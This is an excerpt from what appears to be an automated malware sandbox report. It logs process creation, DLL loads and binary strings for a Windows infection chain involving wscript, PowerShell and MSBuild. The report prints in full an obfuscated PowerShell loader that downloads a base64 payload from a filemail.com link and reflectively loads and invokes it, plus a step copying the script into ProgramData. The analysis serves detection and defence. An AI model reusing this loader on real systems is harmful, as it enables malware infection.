$WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessaries'))"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\marly.js"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\wscript.exe wscript.exe C:\ProgramData\marly.js
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessaries'))"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\marly.js"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+ source: powershell.exe, 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2502322189.0000016F7E3F0000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2502322189.0000016F7E3F0000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: dnlib.dotnet.resourcesuserresourcedatadnlib.dotnetassemblyrefuserdnlib.dotnetresolveexceptiondnlib.dotnet.emitmethodbodyreaderdnlib.dotnet.resourcesresourcewritermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnet.pdbsymbolreadercreatordnlib.peimagesectionheaderdnlib.dotnet.emitlocallistdnlib.dotnet.writermdtablewriterdnlib.dotnetimdtokenproviderdnlib.dotnet.emitmethodbodyreaderbasednlib.dotnetmethodequalitycomparerdnlib.dotnetmdtokendnlib.dotnettypenameparserdnlib.dotnet.writeriheap source: powershell.exe, 00000002.00000002.2512100355.00007FF848950000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000002.00000002.2510865192.00007FF8488CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2512100355.00007FF848950000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2502322189.0000016F7E3F0000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: >.CurrentSystem.Collections.IEnumerator.CurrentSystem.Collections.Generic.IEnumerator<System.Int32>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.UInt32,System.Byte[]>>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.String,System.String>>.get_CurrentSystem.Collections.Generic.IEnumerator<T>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CustomAttribute>.get_CurrentSystem.Collections.Generic.IEnumerator<TValue>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.FieldDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MethodDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.EventDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.PropertyDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.ModuleRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MemberRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyRef>.get_CurrentSystem.Collections.Generic.IEnumerator<System.String>.get_CurrentSystem.Collections.Generic.IEnumerator<TIn>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.TaskFolder>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.Trigger>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CANamedArgument>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MD.IRawRow>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyResolver. source: powershell.exe, 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2502322189.0000016F7E3F0000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2502322189.0000016F7E3F0000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2502322189.0000016F7E3F0000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: `1dnlib.dotnet.mdstreamheaderdnlib.dotnet.mdtableinfodnlib.dotnetmarshalblobreaderdnlib.dotnetitypeormethoddefmicrosoft.win32.taskschedulermonthlydowtriggerdnlib.dotnet.pdbpdbwritermicrosoft.win32.taskschedulertasksettingsmicrosoft.win32.taskschedulertaskserviceversiondnlib.dotneticodedtokendnlib.dotnet.mdrawencmaprowdnlib.dotnet.writeriwritererrordnlib.dotnetimanagedentrypointdnlib.dotnetassemblylinkedresourcednlib.dotnetcablobparserexceptiondnlib.dotnetassemblyattributesdnlib.dotnet.writeritokencreatordnlib.dotnetassemblyresolveexceptiondnlib.dotnetclassorvaluetypesigdnlib.dotnetmethodsigdnlib.dotnetcmodoptsigdnlib.dotnetimplmapmicrosoft.win32.taskschedulertasktriggertypemicrosoft.win32.taskschedulertaskrightsmicrosoft.win32.taskschedulermonthsoftheyeardnlib.pedllcharacteristicsdnlib.dotnetparamattributesdnlib.dotnet.mdicolumnreadersystem.security.accesscontrolaccesscontrolextensionmicrosoft.win32.taskschedulertaskprincipalprivilegesmicrosoft.win32.taskscheduleridletriggermicrosoft.win32.taskscheduler.fluentweeklytriggerbuilderdnlib.dotnetimplmapuserdnlib.dotnet.writerdummymodulewriterlistenermicrosoft.win32.taskschedulerquicktriggertype source: powershell.exe, 00000002.00000002.2510865192.00007FF8488CC000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: `1microsoft.win32.taskscheduleritaskhandlerstatusdnlib.dotnet.writerchunklistbase`1dnlib.iohomednlib.dotneticustomattributednlib.dotnet.pdb.dssisymunmanagedwriter2dnlib.dotnet.writermaxstackcalculatordnlib.dotnet.pdbpdbdocumentusersmicrosoft.win32.taskscheduler.fluentmonthlytriggerbuilderdnlib.dotnet.writerhotpooldnlib.dotneteventattributesdnlib.dotnet.pdb.dsssymbolreadercreatordnlib.dotnet.writermodulewriterbasemicrosoft.win32.taskschedulerpowershellactionplatformoptiondnlib.dotnet.writerioffsetheap`1dnlib.dotnetclasslayoutuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetinterfacemarshaltypemicrosoft.win32.taskschedulertaskeventlogdnlib.dotnetmarshaltypemicrosoft.win32.taskschedulertaskfolderdnlib.dotnet.resourcesresourcereaderexceptionmicrosoft.win32.taskscheduleractioncollectiondnlib.ioioextensionsdnlib.dotnet.writerchunklist`1dnlib.dotnet.emitexceptionhandlertypednlib.dotnet.mddotnetstreamdnlib.dotnetfieldattributesdnlib.dotnetparamdefdnlib.dotnetimemberrefresolverdnlib.dotnet.writerpeheadersdnlib.dotnet.writerwin32resourceschunkmicrosoft.win32.taskschedulernotv1supportedexceptioncronfieldtypednlib.dotnet.writermethodbodychunksdnlib.dotnetcaargumentmicrosoft.win32.taskscheduleritriggeruseriddnlib.dotnetloggereventdnlib.utilsmfunc`3dnlib.dotnetsecurityactiondnlib.dotnet.pdb.dsssymbolwritercreatordnlib.ioibinaryreadermicrosoft.win32.taskschedulersessionstatechangetriggerdnlib.dotnetassemblydefdnlib.dotneticustomattributetypednlib.dotnetmemberrefresolveexceptionmicrosoft.win32.taskschedulertaskcompatibilityentrydnlib.threadingenumerableiteratealldelegate`1dnlib.dotnet.mdridlistdnlib.dotnet.resourcesresourcereadermicrosoft.win32.taskschedulertaskdefinitiondnlib.dotnet.emitcodednlib.dotnetcmodreqdsigdnlib.dotnet.pdbpdbimpltypednlib.utilsilazylist`1dnlib.dotnet.emitflowcontroldnlib.dotnetleafsigdnlib.dotnetcanamedargumentdnlib.peimagefileheaderdnlib.dotnetisignaturereaderhelperdnlib.dotnet.mdheaptypednlib.dotnetvaluearraysigdnlib.dotnettypedefuserdnlib.dotnet.writerimdtablednlib.dotnet.resourcesresourcedatacreatordnlib.dotnet.mdrawmodulerefrowdnlib.dotnet.writercor20headeroptionsdnlib.dotnettypesigdnlib.dotnetalltypeshelper<>c__5`1microsoft.win32.taskschedulermonthlytriggerdnlib.dotnetmethoddefuserdnlib.dotnet.mdmetadataheaderdnlib.dotnet.emitopcodednlib.dotnetihassemanticdnlib.dotnetinterfaceimpldnlib.dotnetitokenoperanddnlib.dotnetidnlibdefmicrosoft.win32.taskschedulercomhandleractiondnlib.dotnetfullnamecreatordnlib.dotnetimethoddecrypterdnlib.dotnet.mdrawrowequalitycomparerdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduleritriggerdelaydnlib.dotnetpropertysigdnlib.dotnetassemblyresolverdnlib.dotnetstrongnamesignerdnlib.dotnetfixedarraymarshaltypednlib.dotnet.pdbpdbscope source: powershell.exe, 00000002.00000002.2510865192.00007FF8488CC000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: `1dnlib.dotnetstandalonesiguserdnlib.dotnetihasdeclsecuritydnlib.dotnetutf8stringequalitycomparerdnlib.dotnet.pdbpdbstatednlib.dotnet.writermetadataheaderoptionsdnlib.dotnet.mdrawconstantrowdnlib.dotnetdeclsecurityusermicrosoft.win32.taskschedulertaskprincipaldnlib.dotnet.writermodulewriterexceptiondnlib.dotnet.pdbisymbolwriter2 source: powershell.exe, 00000002.00000002.2510865192.00007FF8488CC000.00000004.00000800.00020000.00000000.sdmp
